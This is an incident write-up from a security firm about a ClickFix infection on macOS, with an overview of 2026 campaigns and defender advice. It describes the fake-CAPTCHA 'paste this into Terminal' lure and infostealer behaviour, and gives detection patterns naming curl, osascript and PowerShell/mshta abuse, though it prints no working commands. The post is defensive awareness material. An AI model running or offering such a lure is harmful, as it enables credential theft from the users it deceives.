ClickFix: The Attack That Asks You to Compromise Yourself

We recently responded to a macOS compromise where the victim executed the malicious command themselves — willingly, without hesitation, because a website told them to.

No exploit. No zero-day. No phishing email with a malicious attachment. Just a fake CAPTCHA, a bash command, and a user doing what the page instructed.

This is ClickFix — and it's one of the most effective social engineering techniques we've seen gain traction in 2026.

What Happened

A user visited a legitimate company website that had been quietly compromised. Instead of the normal site, they were greeted by what appeared to be a browser security check — a “BotGuard” human verification prompt, styled to look like the Cloudflare CAPTCHA most internet users see dozens of times a week.

The prompt instructed the user to:

1. Open Terminal
2. Paste the provided command
3. Press Enter to “complete verification”

The user followed the steps. The command executed a Base64-encoded AppleScript payload delivered from a command-and-control domain. That payload contacted a secondary C2 server to pull down additional modules. Within seconds, the malware was systematically copying browser databases — saved passwords, active session cookies, browsing history — and staging them in a temporary directory ready for exfiltration.

Huntress EDR detected the activity at execution and automatically isolated the host from the network, cutting off the exfiltration attempt. A non-standard browser profile configuration on this particular machine meant the malware targeted file paths that didn't exist — so credential theft was minimal. Remediation was completed the same day.

The outcome was contained. It easily could not have been.

Why ClickFix Works

ClickFix (sometimes called InstallFix in newer variants) exploits several overlapping psychological and technical realities:

Trusted site, malicious payload. The fake CAPTCHA appears on a real website — one the user has visited before and trusts. The infection begins before the user has any reason to be suspicious.

Familiar UX patterns. Browser-based verification prompts are part of everyday internet use. Users are conditioned to follow them without scrutiny.

Legitimate-sounding branding. Names like “BotGuard,” “Cloudflare Verification,” and “Human Check” borrow credibility from real services.

Developer blind spots. The pattern of curl | bash is a legitimate installation method used by tools like Homebrew, Rust, and nvm. Developers who run install commands regularly are particularly susceptible — the red flags are lower because the pattern is familiar.

Bypasses security controls entirely. Because the user initiates the action, the operating system treats it as legitimate. There's no exploit to detect, no malicious file attachment to block. Traditional security tools largely see nothing until the payload executes.

The Threat Landscape in 2026

ClickFix is no longer a novel technique used by a handful of actors. It has become a full attack framework adopted across at least 20 distinct malware campaigns between February and March 2026 alone, targeting both macOS and Windows users.

On macOS: Users are directed to Terminal to paste a bash or curl command, which downloads an infostealer — typically an AppleScript-based payload or a Nuitka-compiled Python binary.

On Windows: Users are directed to the Run dialog (Win+R), instructed to paste and execute a command that deploys PowerShell or mshta.exe payloads — infostealers like StealC, Lumma Stealer, or Rhadamanthys.

macOS users are disproportionately targeted. Of the campaigns tracked in early 2026, seven targeted macOS exclusively, and nine targeted both platforms. The likely reason: macOS users tend to hold higher-value credentials — SSH keys, cloud API tokens, developer secrets, and cryptocurrency wallets — making each successful infection more lucrative.

Known malware families currently using ClickFix distribution include:

• Infiniti Stealer — macOS-specific, Nuitka-compiled Python infostealer
• MacSync — macOS infostealer with dynamic AppleScript payloads and in-memory execution
• Amatera — Cross-platform, targeting browser data, session tokens, and crypto wallets
• StealC — Windows infostealer harvesting browser logins and Outlook credentials
• Lumma Stealer — Cross-platform, delivered via fake CAPTCHAs and counterfeit app installers
• ModeloRAT — Python-based trojan distributed via the KongTuke traffic distribution system through compromised WordPress sites

Distribution vectors extend beyond compromised websites. ClickFix campaigns also reach users through malvertising (sponsored search results on Google and Bing), SEO-poisoned pages, phishing emails, and fake software installers — including pages mimicking legitimate developer tools.

The variant involved in this incident was first observed only two days before we responded to it. These campaigns rotate infrastructure and payloads rapidly to stay ahead of detection.

The Golden Rule

No legitimate CAPTCHA, verification service, or browser security check will ever ask you to open Terminal, Command Prompt, PowerShell, or the Run dialog and paste a command.

Full stop. This is universally an attack vector. Legitimate verification happens entirely within the browser. If a website asks you to execute a system command — regardless of how professional the prompt looks, how trusted the site is, or how convincing the branding appears — it is attempting to compromise your system. Close the tab.

What Defenders Should Do

For individuals

• Treat any “verification” that requires leaving your browser as an attack — close the tab immediately
• Stop saving passwords in your browser. Use a dedicated password manager (1Password, Bitwarden). Browser credential stores are the primary target of infostealer campaigns
• Enable MFA on all critical accounts
• If you accidentally execute a suspicious command, disconnect from the internet immediately and begin incident response — don't wait to see what happens

For organisations

• Deploy EDR on every endpoint — macOS included. This incident was contained because Huntress detected and isolated the host at execution. Without EDR, there would have been no alert and no containment
• Run security awareness training that specifically covers ClickFix, including both the Terminal (macOS) and Run dialog (Windows) variants. The technique is prevalent enough in 2026 that it warrants dedicated coverage
• Monitor for osascript execution referencing browser data paths, curl commands contacting unknown domains, and PowerShell/mshta.exe execution from user-initiated contexts
• Alert on abnormal file descriptor limit changes on macOS — this is a known ClickFix indicator
• Block known malicious domains at the network perimeter and keep IOC feeds current
• If you run WordPress-based web properties, monitor for KongTuke/404 TDS injection indicators — the KongTuke traffic distribution system is actively compromising WordPress sites to inject fake CAPTCHA lures

For website owners

• Audit your web applications regularly for injected JavaScript
• Implement Content Security Policy (CSP) headers to restrict unauthorised script execution
• Use Subresource Integrity (SRI) for third-party scripts
• Keep WordPress plugins updated — plugin vulnerabilities are a primary compromise vector for sites being used in ClickFix distribution

The Bottom Line

The three factors that limited damage in this incident were: a non-standard browser configuration that happened to put credential data outside the malware's default target paths, Huntress EDR detecting and isolating the host within seconds of execution, and immediate incident response. Two of those three are things you can control. One was luck.

ClickFix works because it replaces technical exploitation with social engineering — and social engineering scales. The same attack that compromised a macOS developer machine this week is running across dozens of campaigns simultaneously, hitting Windows endpoints through Run dialog lures, targeting accounting firm staff through fake Cloudflare prompts, and reaching developers through fake installer pages for tools they actually use.

The technique will keep evolving. InstallFix variants have already eliminated the fake CAPTCHA step entirely, masquerading as legitimate software installers to trigger the same user-initiated execution.

The defence doesn't change: know the pattern, trust your endpoint controls, and treat any web-initiated request to run a system command as hostile.

How Stealth Cyber Helps

Stealth Cyber provides managed detection and response, incident response, and security awareness training for SMBs across Australia and globally. Our SOC monitors your endpoints around the clock, and our incident response team is on call when something gets through.

This incident was contained because the right controls were already in place. If you want to understand your organisation's exposure to social engineering campaigns like ClickFix — or make sure you have the detection and response capability to catch what your users miss — we can help.